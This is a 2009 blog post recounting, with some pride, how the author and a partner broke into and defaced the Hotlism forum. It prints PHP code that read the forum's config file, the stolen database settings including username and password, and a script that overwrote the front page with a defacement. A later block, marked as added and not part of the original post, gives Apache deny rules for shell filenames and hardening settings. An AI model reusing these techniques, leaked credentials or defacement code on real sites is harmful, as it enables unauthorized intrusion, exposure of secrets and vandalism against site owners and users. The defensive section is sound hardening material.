Friday, February 6, 2009

how we hacked hotlism


Maldivian forums were all about hacking and being hacked to prove who was superior. Hotlism was one of the few forums left that had not yet been hacked. Since it was going to happen eventually and somebody was going to take the initiative, I thought: why not me? A background check on Hotlism revealed that it had a lot of security-aware people on its team, which made everything tough and look impossible. So I formed a 50/50 partnership with ProxyGod.

We neither have nor had anything against Hotlism, except for them and their users boasting too much about never having been hacked and being "UNHACKABLE". After a few days of looking around, ProxyGod managed to break into one of the blogs hosted on Hotlism (rezorn.hotlism.org). He broke in and immediately passed the info on to me.

First I uploaded a shell to their server. But guess what? It didn't work. They seemed to be using .htaccess files to block requests to files whose names look like shells. Here is what I got.



Then I gave up on that shell and wrote a file on their server with the following contents:

<?php
// Read the forum's config file and print it into the response.
echo file_get_contents('/forums/conf_global.php');
?>

And voilà. I got a plaintext version of their database details, which were:
$INFO['use_eaccelerator'] = 1;
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'localhost';
$INFO['sql_database'] = 'vpshotli_hotlism';
$INFO['sql_user'] = 'vpshotli_fuck';
$INFO['sql_pass'] = 'fuckfest';
$INFO['sql_tbl_prefix'] = 'ibf_';
$INFO['sql_debug'] = '1';
$INFO['board_start'] = '1213218696';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://hotlism.org/forums';
$INFO['banned_group'] = '5';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
?>

With that, I immediately dumped their database and downloaded it (thinking it might come in handy later). After that I simply wrote a new file to their server with the following contents and ran it:


<?php
// Defacement page held in a heredoc, then written over the forum's front page.
$defaced = <<<html
<html>
<head>
<title>Hacked</title>
</head>
<body style='text-align: center;'>
<p>&nbsp;</p>
<h2>= OOOpS! HACKED =</h2>
Proxy God - ChronO<br/>
= * = * = * = * = * =<br/>
People were starting to make all sorts of craxy assumptions about<br/>
hotlism that something like this just had to happen. Next time just<br/>
dont pucking go about thinking you are perfect.<br/><br/>
Anonymity is freedom<br/>
We hope it doesnt hurt too bad.
</body>
</html>
html;
file_put_contents('/forums/index.php', $defaced);
?>

That defaced them easily. All that was left was to add a shoutbox to see who was in on the fun, but it seems we were a little late: the Hotlism guys somehow managed to suspend their own account, and everything was gone, including Hotlism's unhacked record. And that was the story of how ProxyGod and I hacked Hotlism.
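Two things in the chain above deserve a closer look from the defender's side. The .htaccess rule only blocked requests to files whose names looked like known shells, so a freshly named two-line PHP file ran without trouble; and once PHP was running inside the blog, nothing stopped it from reading the forum's conf_global.php and overwriting /forums/index.php, because both sites evidently lived under the same hosting account (note the shared vpshotli_ prefix). The following is an added example, not from the original post and not Hotlism's actual configuration (which is never shown); the directory paths and the DocumentRoot are assumptions. It puts the kind of filename deny list the post implies next to the two settings that would actually have stopped each step.

```apache
# --- Weak: what the post's behaviour suggests was in place --------------
# Only requests whose filename matches a known shell name are refused.
# A file called dump.php or x.php is still executed as PHP.
<FilesMatch "(?i)(c99|r57|shell|cmd)\.php$">
    Require all denied          # Apache 2.4; on 2.2 use "Deny from all"
</FilesMatch>

# --- Stronger, part 1: no PHP execution in writable directories ----------
# Drop this .htaccess into any directory the blog can write to (uploads,
# cache, themes). It does not matter what the file is called: mod_php will
# not run it, and the handler fallback refuses the request outright.
<IfModule mod_php.c>
    php_flag engine off
</IfModule>
<FilesMatch "\.(php|phtml|php[0-9])$">
    Require all denied
</FilesMatch>

# --- Stronger, part 2: confine each site to its own tree -----------------
# This goes in the blog's VirtualHost (php_admin_value cannot be set from
# .htaccess). With open_basedir restricted, file_get_contents() on the
# forum's conf_global.php and file_put_contents() on /forums/index.php
# both fail from code running under the blog, even if step 1 is bypassed.
# DocumentRoot is an assumed path.
<VirtualHost *:80>
    ServerName rezorn.hotlism.org
    DocumentRoot /var/www/rezorn
    php_admin_value open_basedir "/var/www/rezorn:/tmp"
</VirtualHost>
```

The deny list is the part that gave a false sense of safety: it can only ever match names the attacker chose not to use. The two stronger settings address the actual conditions the post relied on, namely that an arbitrary PHP file would execute and that it could reach the forum's files. Running the blog and the forum as separate system users (or on separate accounts) achieves the same isolation as open_basedir at the OS level and does not depend on PHP honouring it.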

2 comments:

  1. wow you fucking liar.
    How the fuck will it dump all that info on the server
    <?php
    echo file_get_contents('/forums/conf_global.php');
    ?>

    noob thiyothee eche hack vefa

  2. Slice was here. -_-. Chr0no I trust :P. Nice job
